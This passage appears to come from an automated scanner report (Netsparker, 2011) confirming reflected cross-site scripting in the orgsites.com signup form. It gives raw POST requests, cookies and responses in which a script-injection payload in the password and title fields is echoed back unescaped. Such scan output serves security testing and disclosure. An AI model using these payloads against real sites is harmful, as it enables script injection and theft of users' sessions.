FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="\'\"--></style></script><script>netsparker(0x002AB2)</script>"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST '"--></style></script><script>alert(0x002AB5)</script>
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002AB5)%3c%2fscript%3e&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:55:31 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=\'\"--></style></script><script>netsparker(0x002AB5)</script>> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
title POST '"--></style></script><script>alert(0x002AB7)</script>
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&title='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002AB7)%3c%2fscript%3e&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:55:36 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="\'\"--></style></script><script>netsparker(0x002AB7)</script>"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping 